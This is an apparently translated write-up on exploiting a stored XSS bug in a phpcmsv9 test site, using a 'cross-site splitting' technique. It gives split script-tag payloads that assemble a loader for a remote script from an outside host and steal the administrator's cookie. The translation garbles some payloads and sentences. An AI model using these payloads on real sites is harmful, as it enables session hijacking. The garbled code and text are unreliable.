XSS Cross-Site Splitting

XSS Cross-Site Splitting
0x01: Description

Recently, a phpcmsv9 website was built and used for testing. It is a low version and has many vulnerabilities. Many vulnerability analyses can be found on wooyun. In this case, I want to take a look at the vulnerability and find a stored XSS. I don't know if someone has discovered it before. The following describes how to exploit the vulnerability.

0x02: Cross-Site Splitting

What is the Cross-Site Splitting Method? Let's talk about its principles first.

Jianxin, a famous security researcher, once published an article called Crazy cross-site trip, which describes a special Xss exploitation technique, that is, how to use the "split method" to execute cross-site scripting code when the application does not filter key characters (such as <,>) in Xss but has limits on the length of input characters.

At that time, Jianxin found that a website had an Xss vulnerability. The vulnerability appeared in the comment contact information. However, this vulnerability can only contain 30 characters and must be It takes up to 17 characters, and only 13 characters are available. Therefore, this Xss can only be used to pop up a dialog box. Fortunately, the comments of the website can be reposted, that is, multiple script tags can be submitted. Therefore, the following Expliot is created in the sword mind:

<Script> z = 'document. write' </script> <script> z = Z + 'write ("'</script> <script> z = z +' <script> '</script> <script> z = z + 'src = ht '</script> <script> z = z + 'tp: // ww '</script> <script> z = z +' w. shell '</script> <script> z = z + '. net/1. '</script> <script> z = z +' js>
The purpose of the above Code is to introduce a string variable Z and split the downstream code:
document.write（'
  
     src=//www.shell.net/1.js>
  ')
Then it is embedded into the variable Z several times, and finally the code is cleverly executed through eval (Z. It can be seen that the core of the Cross-Site Splitting Method is to divide the cross-site code into several fragments, and then splice them together for execution in a certain way, this is similar to the shellcode exploitation method of buffer overflow.
0x03: vulnerability Exploitation
The above Cross-Site Splitting Method is officially used to exploit this vulnerability. The XSS vulnerability occurs in short messages in the member center.
First, write a short message normally and then send it. At this time, use Burpsuit to intercept packet capture and insert the recipient's location into the js Code.
<script>alert(/xss/)</script>
View the short message in the background to trigger the js
.
However, it is not easy to insert the js Code to obtain the cookie, because the database limits the length of the recipient's name.
Only strings smaller than or equal to 30 can be inserted at a time. Therefore, you can try the Cross-Site Splitting Method.
First, let's clarify our goal: we try to insert such a javascript code into the website background.
<script>z=document.write("<script src=http://is.gd/2p1PJ9></script>")eval(z)
Then we try to split it into ten parts:
<script>z='document'</script><script>z=z+'.write('</script><script>z=z+'"
  
   '</script><script>z=z+'")'</script><script>alert(z)</script>
  
Send 10 short messages and insert them into the website background. + the url encoding is required. Let's take a look at the effect.
The recipient is the js we inserted, so nothing is displayed. Then let's take a look at the source code.
The red line is the js we inserted, which is then divided into 10 executions, and finally the cookie is successfully obtained: